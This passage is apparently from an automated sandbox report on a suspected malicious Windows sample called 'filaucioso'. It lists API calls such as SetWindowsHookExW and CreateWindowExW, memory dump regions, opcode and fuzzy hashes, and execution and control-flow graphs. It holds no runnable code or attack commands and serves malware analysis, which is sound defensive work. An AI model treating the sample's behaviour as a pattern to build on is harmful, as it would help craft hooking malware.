                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\ProgramData
                                                                        • API String ID: 2709904686-3468326271
                                                                        • Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                        • Instruction ID: cdf7710bfdc0c04f3d6b4f220b8e9fd9f04d7b2eba678cf51078301a7514d20a
                                                                        • Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                        • Instruction Fuzzy Hash: 5AD0C7E2409D705EF30372549D05B9F6A48DF17715F1A0467E181A61A1C67C4D4247BD
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3A115B
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A11B4
                                                                        • GlobalFree.KERNEL32(?), ref: 6E3A11C7
                                                                        • GlobalFree.KERNEL32(?), ref: 6E3A11F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$Alloc
                                                                        • String ID:
                                                                        • API String ID: 1780285237-0
                                                                        • Opcode ID: f1c03a6c44813f903408450d72c0b3471a83a1807f344abc4b2e0b316748a496
                                                                        • Instruction ID: 3e1261a95ca130a2b32db9bdefb31605a8edb642e8e126cf607661fc94c25ae5
                                                                        • Opcode Fuzzy Hash: f1c03a6c44813f903408450d72c0b3471a83a1807f344abc4b2e0b316748a496
                                                                        • Instruction Fuzzy Hash: 1231ACF1408645AFEB00CFECD948A6ABFBDFB06250B244595EA55C2210EB35DCC9CB20
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
                                                                        • CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B24
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                        • Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
                                                                        • Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                        • Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9

                                                                        Execution Graph

                                                                        Execution Coverage:10.1%
                                                                        Dynamic/Decrypted Code Coverage:96.6%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:174
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 29859 366c74d8 PeekMessageW 29860 366c754f 29859->29860 29693 d7988 29694 d79b6 29693->29694 29696 d79d2 29694->29696 29697 d6f24 29694->29697 29699 d6f2f 29697->29699 29698 d84fc 29701 d8557 29698->29701 29766 366c6fc9 29698->29766 29700 d83c4 29699->29700 29702 d865f 29699->29702 29705 d6f24 3 API calls 29699->29705 29711 d82ac 29699->29711 29724 d8265 29699->29724 29700->29698 29738 da0bb 29700->29738 29745 da188 29700->29745 29752 da100 29700->29752 29759 da087 29700->29759 29701->29696 29702->29696 29705->29700 29713 d825a 29711->29713 29712 d84fc 29715 d8281 29712->29715 29719 366c6fc9 WaitMessage 29712->29719 29714 d83c4 29713->29714 29713->29715 29716 d82ac 3 API calls 29713->29716 29717 d8265 3 API calls 29713->29717 29718 d6f24 3 API calls 29713->29718 29714->29712 29720 da188 3 API calls 29714->29720 29721 da0bb 3 API calls 29714->29721 29722 da087 3 API calls 29714->29722 29723 da100 3 API calls 29714->29723 29715->29700 29716->29714 29717->29714 29718->29714 29719->29715 29720->29712 29721->29712 29722->29712 29723->29712 29725 d8281 29724->29725 29727 d825a 29724->29727 29725->29700 29726 d82a1 29726->29700 29727->29724 29727->29726 29728 d83c4 29727->29728 29735 d82ac 3 API calls 29727->29735 29736 d8265 3 API calls 29727->29736 29737 d6f24 3 API calls 29727->29737 29729 d84fc 29728->29729 29731 da188 3 API calls 29728->29731 29732 da0bb 3 API calls 29728->29732 29733 da087 3 API calls 29728->29733 29734 da100 3 API calls 29728->29734 29729->29725 29730 366c6fc9 WaitMessage 29729->29730 29730->29725 29731->29729 29732->29729 29733->29729 29734->29729 29735->29728 29736->29728 29737->29728 29740 da0bf 29738->29740 29739 da0c4 29739->29698 29740->29739 29770 da390 29740->29770 29778 da330 29740->29778 29782 da2f5 29740->29782 29786 da338 29740->29786 29747 da197 29745->29747 29746 da1cd 29746->29698 29747->29746 29748 da338 3 API calls 29747->29748 29749 da2f5 3 API calls 29747->29749 29750 da330 3 API calls 29747->29750 29751 da390 3 API calls 29747->29751 29748->29746 29749->29746 29750->29746 29751->29746 29753 da104 29752->29753 29754 da1cd 29753->29754 29755 da338 3 API calls 29753->29755 29756 da2f5 3 API calls 29753->29756 29757 da330 3 API calls 29753->29757 29758 da390 3 API calls 29753->29758 29754->29698 29755->29754 29756->29754 29757->29754 29758->29754 29760 da08c 29759->29760 29761 da0bf 29759->29761 29760->29698 29761->29760 29762 da338 3 API calls 29761->29762 29763 da2f5 3 API calls 29761->29763 29764 da330 3 API calls 29761->29764 29765 da390 3 API calls 29761->29765 29762->29760 29763->29760 29764->29760 29765->29760 29768 366c6ff9 29766->29768 29767 366c73d8 WaitMessage 29767->29768 29768->29767 29769 366c7084 29768->29769 29771 da394 29770->29771 29772 da3cd 29771->29772 29775 da35b 29771->29775 29774 da3f0 29772->29774 29794 d8180 29772->29794 29774->29774 29776 da37e 29775->29776 29790 d814c 29775->29790 29776->29739 29779 da334 29778->29779 29780 da37e 29779->29780 29781 d814c 3 API calls 29779->29781 29780->29739 29781->29780 29782->29782 29783 da302 29782->29783 29784 da37e 29783->29784 29785 d814c 3 API calls 29783->29785 29784->29739 29785->29784 29787 da345 29786->29787 29788 da37e 29787->29788 29789 d814c 3 API calls 29787->29789 29788->29739 29789->29788 29791 d8157 29790->29791 29792 d8180 3 API calls 29791->29792 29793 da3f0 29791->29793 29792->29793 29793->29793 29795 d818b 29794->29795 29800 d8190 29795->29800 29797 da45f 29806 dfad0 29797->29806 29798 da499 29798->29774 29801 d819b 29800->29801 29802 d82ac 3 API calls 29801->29802 29803 db899 29801->29803 29802->29803 29804 db9e0 29803->29804 29805 da188 3 API calls 29803->29805 29804->29797 29805->29804 29808 dfb01 29806->29808 29809 dfc01 29806->29809 29807 dfb0d 29807->29798 29808->29807 29812 366c0e8f 29808->29812 29816 366c0ea0 29808->29816 29809->29798 29813 366c0ecb 29812->29813 29814 366c0f7a 29813->29814 29820 366c1e10 29813->29820 29818 366c0ecb 29816->29818 29817 366c0f7a 29817->29817 29818->29817 29819 366c1e10 2 API calls 29818->29819 29819->29817 29821 366c1ee0 29820->29821 29821->29814 29822 366c1ff3 CreateWindowExW 29821->29822 29823 366c2054 29822->29823 29827 366c3248 29823->29827 29832 366c3258 29823->29832 29828 366c3285 29827->29828 29829 366c32b7 29828->29829 29837 366c34ac 29828->29837 29842 366c33e0 29828->29842 29833 366c3285 29832->29833 29834 366c32b7 29833->29834 29835 366c34ac CallWindowProcW 29833->29835 29836 366c33e0 CallWindowProcW 29833->29836 29835->29834 29836->29834 29838 366c346a 29837->29838 29839 366c34ba 29837->29839 29846 366c3498 29838->29846 29840 366c3480 29840->29829 29844 366c33f4 29842->29844 29843 366c3480 29843->29829 29845 366c3498 CallWindowProcW 29844->29845 29845->29843 29847 366c34a9 29846->29847 29848 366c4589 CallWindowProcW 29846->29848 29847->29840 29848->29847 29849 d7128 29850 d716e GetCurrentProcess 29849->29850 29852 d71b9 29850->29852 29853 d71c0 GetCurrentThread 29850->29853 29852->29853 29854 d71fd GetCurrentProcess 29853->29854 29855 d71f6 29853->29855 29856 d7233 29854->29856 29855->29854 29857 d725b GetCurrentThreadId 29856->29857 29858 d728c 29857->29858 29861 ad0fc 29862 ad114 29861->29862 29863 ad16e 29862->29863 29865 366c3248 CallWindowProcW 29862->29865 29866 366c3258 CallWindowProcW 29862->29866 29869 366c1e10 2 API calls 29862->29869 29871 366c20e8 29862->29871 29876 366c1f30 29862->29876 29883 366c2087 29862->29883 29888 366c20d7 29862->29888 29865->29863 29866->29863 29869->29863 29872 366c210e 29871->29872 29874 366c3248 CallWindowProcW 29872->29874 29875 366c3258 CallWindowProcW 29872->29875 29873 366c212f 29873->29863 29874->29873 29875->29873 29877 366c1f98 CreateWindowExW 29876->29877 29879 366c2054 29877->29879 29881 366c3248 CallWindowProcW 29879->29881 29882 366c3258 CallWindowProcW 29879->29882 29880 366c212f 29880->29863 29881->29880 29882->29880 29884 366c2095 29883->29884 29886 366c3248 CallWindowProcW 29884->29886 29887 366c3258 CallWindowProcW 29884->29887 29885 366c212f 29885->29863 29886->29885 29887->29885 29889 366c2096 29888->29889 29889->29888 29891 366c3248 CallWindowProcW 29889->29891 29892 366c3258 CallWindowProcW 29889->29892 29890 366c212f 29890->29863 29891->29890 29892->29890 29893 d2270 29894 d22b4 SetWindowsHookExW 29893->29894 29896 d22fa 29894->29896 29897 d7370 DuplicateHandle 29898 d7406 29897->29898

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 129 d711b-d7122 130 d7124 129->130 131 d7157-d71b7 GetCurrentProcess 129->131 132 d7126-d7154 130->132 133 d70e1-d70e2 130->133 140 d71b9-d71bf 131->140 141 d71c0-d71f4 GetCurrentThread 131->141 132->131 135 d70cd-d70d3 133->135 136 d70e3 133->136 140->141 142 d71fd-d7231 GetCurrentProcess 141->142 143 d71f6-d71fc 141->143 144 d723a-d7255 call d72f8 142->144 145 d7233-d7239 142->145 143->142 149 d725b-d728a GetCurrentThreadId 144->149 145->144 150 d728c-d7292 149->150 151 d7293-d72f5 149->151 150->151
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 000D71A6
                                                                        • GetCurrentThread.KERNEL32 ref: 000D71E3
                                                                        • GetCurrentProcess.KERNEL32 ref: 000D7220
                                                                        • GetCurrentThreadId.KERNEL32 ref: 000D7279
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007505837.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_d0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: d10b4975dd7cfe1c75e25db93db6b131d2726ca771f1a44cd5fd544463c685f2
                                                                        • Instruction ID: ccfbb66f2d9adb87e09e4f98e6a38c5112d63db8fff09f08e2483b95a58bd9a6
                                                                        • Opcode Fuzzy Hash: d10b4975dd7cfe1c75e25db93db6b131d2726ca771f1a44cd5fd544463c685f2
                                                                        • Instruction Fuzzy Hash: E281BEB0815345CFEB09DF6AC8886AEBFF1EF99301F24895AE04CA7261D7351885CF65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 371 366c1e10-366c1ede 372 366c1ee0-366c1f0d 371->372 373 366c1f13-366c1f24 371->373 372->373 374 366c1f26-366c1f6e 373->374 375 366c1f72-366c1f96 373->375 374->375 376 366c1f98-366c1f9e 375->376 377 366c1fa1-366c1fa8 375->377 376->377 378 366c1faa-366c1fb0 377->378 379 366c1fb3-366c2052 CreateWindowExW 377->379 378->379 381 366c205b-366c2093 379->381 382 366c2054-366c205a 379->382 386 366c2095-366c2098 381->386 387 366c20a0-366c20e5 381->387 382->381 386->387 389 366c2096-366c209e 387->389 390 366c20e7-366c2128 387->390 389->387 394 366c212a call 366c3248 390->394 395 366c212a call 366c3258 390->395 393 366c212f-366c2134 394->393 395->393
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030111048.00000000366C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_366c0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: 39c30813cef485b38a3e955b603aa136656f236c8b19d8c5524c68d4987fdac0
                                                                        • Instruction ID: 6a71d9b978614e763698a55b7e84cbec7d23b5c81dded563c1398bf850b0ff9d
                                                                        • Opcode Fuzzy Hash: 39c30813cef485b38a3e955b603aa136656f236c8b19d8c5524c68d4987fdac0
                                                                        • Instruction Fuzzy Hash: 268157B1C08389AFDB06CFA5C8509CDBFB5FF4A344F15819AE844AB262C770A845CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 396 36843ec6-36843f15 call 36844a20 401 36843f1b-36843f27 396->401 402 36843f2d-36843f41 401->402 403 36844909-36844931 401->403 406 36843f43-36843f56 402->406 407 36843f5b-36843f6c 402->407 421 36844936-3684493d 403->421 406->421 412 36843f6e-36843f95 407->412 413 36843f9a-36843fab 407->413 412->421 418 36843fad-36843fb9 413->418 419 36843fbe-36843fcf 413->419 418->421 427 36843fd1-36843fda 419->427 428 3684401b-3684402c 419->428 427->403 429 36843fe0-36843fe6 427->429 432 36844074-36844085 428->432 433 3684402e-36844037 428->433 429->403 431 36843fec-36844016 429->431 431->421 439 36844087-36844090 432->439 440 368440bf-368440d0 432->440 433->403 434 3684403d-36844043 433->434 434->403 437 36844049-3684406f 434->437 437->421 439->403 441 36844096-368440ba 439->441 445 368440d6-368440f3 440->445 446 3684415b-3684416c 440->446 441->421 445->403 461 368440f9-36844128 call 36843adc 445->461 454 3684418d-3684419e 446->454 455 3684416e-36844177 446->455 463 368441a0-368441a9 454->463 464 368441c2-368441d3 454->464 455->403 459 3684417d-36844188 455->459 459->421 461->403 480 3684412e-36844156 call 36843aec 461->480 463->403 466 368441af-368441bd 463->466 470 368441d5-368441e7 464->470 471 368441ec-368441fd 464->471 466->421 470->421 476 36844216-36844227 471->476 477 368441ff-36844211 471->477 484 36844240-36844251 476->484 485 36844229-3684423b 476->485 477->421 480->421 490 36844257-368442d5 484->490 491 368442f0-36844301 484->491 485->421 490->403 520 368442db-368442eb 490->520 496 36844303-36844310 491->496 497 3684433a-3684434b 491->497 496->421 502 36844351-368443cf 497->502 503 368443ea-368443fb 497->503 502->403 536 368443d5-368443e5 502->536 509 36844434-36844445 503->509 510 368443fd-3684440a 503->510 515 36844447-36844478 call 36842b40 509->515 516 3684447d-3684448e 509->516 510->421 515->421 523 368444a0-368444b1 516->523 524 36844490-3684449b call 36842b40 516->524 520->421 531 368444b3-368444e4 call 36842b40 523->531 532 368444e9-368444fa 523->532 524->421 531->421 539 36844587-36844598 532->539 540 36844500-3684451a 532->540 536->421 549 368445e3-368445f4 539->549 550 3684459a-368445a3 539->550 540->403 547 36844520-3684452b 540->547 555 36844563-36844582 547->555 556 3684452d-3684455e call 36842b40 547->556 557 368445f6-3684464c call 36842b40 549->557 558 36844651-36844662 549->558 550->403 551 368445a9-368445bd 550->551 551->403 561 368445c3-368445de 551->561 555->421 556->421 557->421 568 368448e0-368448f1 558->568 569 36844668-368448aa call 36843afc call 36843b0c call 36843b1c call 36843b2c call 36843b3c call 36843b0c call 36843b1c call 36843b4c call 36843b5c call 36842b40 558->569 561->421 568->421 578 368448f3-368448fc 568->578 569->421 578->403 583 368448fe-36844907 578->583 583->421
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q$#-<^
                                                                        • API String ID: 0-372547664
                                                                        • Opcode ID: aa64d30a83540b362cc88c5e99e16c3191d7fd3bbf380484f60c2d682a22e044
                                                                        • Instruction ID: 4aa7d4ec9c97fabc23eb0cd45887bf46307b4abf9b7d441e9a1e57951e659040
                                                                        • Opcode Fuzzy Hash: aa64d30a83540b362cc88c5e99e16c3191d7fd3bbf380484f60c2d682a22e044
                                                                        • Instruction Fuzzy Hash: 1942AE34B007148FDB16EB34C969B5D7BB2EF89340F108199D50AAB3A5EF35EC428B95
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030111048.00000000366C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_366c0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4113a6a1884dd681e751e2ac7c6d4247e4077a4726c8c955f5c6f7c179071bca
                                                                        • Instruction ID: 7e79f4ad2abb917809f4886c7b53c428ea050db87303383ed24e1db3f1488a98
                                                                        • Opcode Fuzzy Hash: 4113a6a1884dd681e751e2ac7c6d4247e4077a4726c8c955f5c6f7c179071bca
                                                                        • Instruction Fuzzy Hash: 0CD126B4A00709CFEB04DFA9C858B9DBFB1FF48344F54C558E809AB2A1DB75A945CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57cf63e34d72415243e90e350a151c4b7578c3e16c5a7c07a508e04c3cd7f3b0
                                                                        • Instruction ID: 4aba5aa534c265ea96aa0bb556358a3c9d31c901c245f39559c63b7b1835dae2
                                                                        • Opcode Fuzzy Hash: 57cf63e34d72415243e90e350a151c4b7578c3e16c5a7c07a508e04c3cd7f3b0
                                                                        • Instruction Fuzzy Hash: C4B13A70E0021D8FDB01DFAAD8857AEBBF2AF8D344F148129D955E7294EB749845CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 022c2371786e85aa73d315fc8cfd8c49f1fc32dfdead278cc50243c858ea2391
                                                                        • Instruction ID: a0fdab59acc7a4d9677e6b21080cd1786d127bdceb28074939093144bb26577c
                                                                        • Opcode Fuzzy Hash: 022c2371786e85aa73d315fc8cfd8c49f1fc32dfdead278cc50243c858ea2391
                                                                        • Instruction Fuzzy Hash: 32B15DB4E1021DCFDB01DFAAD8817ADBFF2AF8C354F148529D854A7294EB749846CB81

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 158 d7128-d71b7 GetCurrentProcess 162 d71b9-d71bf 158->162 163 d71c0-d71f4 GetCurrentThread 158->163 162->163 164 d71fd-d7231 GetCurrentProcess 163->164 165 d71f6-d71fc 163->165 166 d723a-d7255 call d72f8 164->166 167 d7233-d7239 164->167 165->164 171 d725b-d728a GetCurrentThreadId 166->171 167->166 172 d728c-d7292 171->172 173 d7293-d72f5 171->173 172->173
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 000D71A6
                                                                        • GetCurrentThread.KERNEL32 ref: 000D71E3
                                                                        • GetCurrentProcess.KERNEL32 ref: 000D7220
                                                                        • GetCurrentThreadId.KERNEL32 ref: 000D7279
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007505837.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_d0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 1e7d1989fed3f1235f630d18f6ecf0d4dc6c147c0f6d51e92a0e962a061cabaa
                                                                        • Instruction ID: 86f4629aabeb4416b7b3b756a2fc995153aca3c39733a8a77e67781e52e107fe
                                                                        • Opcode Fuzzy Hash: 1e7d1989fed3f1235f630d18f6ecf0d4dc6c147c0f6d51e92a0e962a061cabaa
                                                                        • Instruction Fuzzy Hash: EA5155B09003498FDB14DFAAD948BEEBBF1EF88314F20851AE419A7350DB746985CF65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 180 36842ef8-36842f18 181 36842f1f-36842f30 180->181 182 36842f1a 180->182 185 36842f36-36842f42 181->185 186 368431c9-368431d0 181->186 183 36843238-3684323f 182->183 187 36843092-368430bf 185->187 188 36842f48-36842f52 185->188 186->183 199 368430c5-368430cb 187->199 200 36843167-3684318e 187->200 189 36842f58-36842f5e 188->189 190 3684321b-36843233 188->190 192 36842f64-36842f87 call 36843240 189->192 193 3684307f-3684308d 189->193 190->183 215 36842f8d-36842fcf 192->215 198 368431d2-3684320d 193->198 217 36843214 198->217 199->200 202 368430d1-36843165 199->202 209 36843194-3684319a 200->209 210 36843216 200->210 202->198 209->210 211 3684319c-3684319e 209->211 210->190 213 368431a6-368431a9 211->213 214 368431a0-368431a2 211->214 213->210 219 368431ab-368431ae 213->219 214->210 218 368431a4 214->218 231 36842fd1-36843027 215->231 232 3684302c-3684303d 215->232 217->183 218->219 219->210 220 368431b0-368431c7 219->220 220->198 231->183 232->210 233 36843043-36843045 232->233 235 36843047-36843049 233->235 236 36843051-36843054 233->236 235->210 238 3684304f 235->238 236->210 240 3684305a-3684305d 236->240 238->240 240->210 242 36843063-3684307a 240->242 242->198
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q$Te^q$xbq$xbq
                                                                        • API String ID: 0-475898947
                                                                        • Opcode ID: a6717a5b6ad05fe22b30fc7cc0ba6883ffb8606ba203e90cf794113243d783a7
                                                                        • Instruction ID: 3bcffc6a9f09b59b25f4e354fb0bab60ff55db0792a65d82624f5527f37a5490
                                                                        • Opcode Fuzzy Hash: a6717a5b6ad05fe22b30fc7cc0ba6883ffb8606ba203e90cf794113243d783a7
                                                                        • Instruction Fuzzy Hash: 0991AE786007588FE705EF39D884B4D7BE2FB8D315B608659E815AB3A1DB74EC06CB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1004 36842b40-36842b74 1006 36842b76 1004->1006 1007 36842b7b-36842b8d 1004->1007 1006->1007 1009 36842ce5-36842d00 1007->1009 1010 36842b93-36842c5e 1007->1010 1013 36842d02 1009->1013 1014 36842d0a 1009->1014 1031 36842c66-36842c69 1010->1031 1032 36842c60-36842c62 1010->1032 1013->1014 1016 36842d0b 1014->1016 1016->1016 1034 36842cad 1031->1034 1035 36842c6b-36842c91 1031->1035 1033 36842c64 1032->1033 1032->1034 1033->1035 1036 36842cb2-36842cb6 1034->1036 1040 36842c98-36842cab 1035->1040 1038 36842cc1-36842cc2 1036->1038 1039 36842cb8 1036->1039 1038->1009 1039->1038 1040->1036
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q$xbq
                                                                        • API String ID: 0-3223151289
                                                                        • Opcode ID: 21f83fd2a1ed2316056a00a7b0e23c074f1ae9df227e8de7692018182aff6481
                                                                        • Instruction ID: d49457f2c06f4f2a04c4ba2469663139385c59a670ec6ebf2ca07ab7eadfe3a3
                                                                        • Opcode Fuzzy Hash: 21f83fd2a1ed2316056a00a7b0e23c074f1ae9df227e8de7692018182aff6481
                                                                        • Instruction Fuzzy Hash: 5E514C74B142089FDB05EB79C864BADBBF2AF88310F208169E505EB3A1CB75DC41CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1042 36842b3a-36842b74 1044 36842b76 1042->1044 1045 36842b7b-36842b8d 1042->1045 1044->1045 1047 36842ce5-36842d00 1045->1047 1048 36842b93-36842c5e 1045->1048 1051 36842d02 1047->1051 1052 36842d0a 1047->1052 1069 36842c66-36842c69 1048->1069 1070 36842c60-36842c62 1048->1070 1051->1052 1054 36842d0b 1052->1054 1054->1054 1072 36842cad 1069->1072 1073 36842c6b-36842c91 1069->1073 1071 36842c64 1070->1071 1070->1072 1071->1073 1074 36842cb2-36842cb6 1072->1074 1078 36842c98-36842cab 1073->1078 1076 36842cc1-36842cc2 1074->1076 1077 36842cb8 1074->1077 1076->1047 1077->1076 1078->1074
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q$xbq
                                                                        • API String ID: 0-3223151289
                                                                        • Opcode ID: 69777747396eb53933c7c244d48c8025125f84c5fefe1bdf77350da26ba0436e
                                                                        • Instruction ID: 14ff082405ca1f5bfc01b335240cce9a07251b6b39ab18842eaf327ca3f56606
                                                                        • Opcode Fuzzy Hash: 69777747396eb53933c7c244d48c8025125f84c5fefe1bdf77350da26ba0436e
                                                                        • Instruction Fuzzy Hash: 4F411674B102049FDB05DB39C858BADBBF2AF88310F658569E506EB3A1CB75EC41CB94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: bde08ad4c6603aab6767f71e2df04436140971211a61a92fa81823127a5d3cdf
                                                                        • Instruction ID: b196be210d29f10babf797330747fd465cdd4bc39976e77490936e4cdffcf9b8
                                                                        • Opcode Fuzzy Hash: bde08ad4c6603aab6767f71e2df04436140971211a61a92fa81823127a5d3cdf
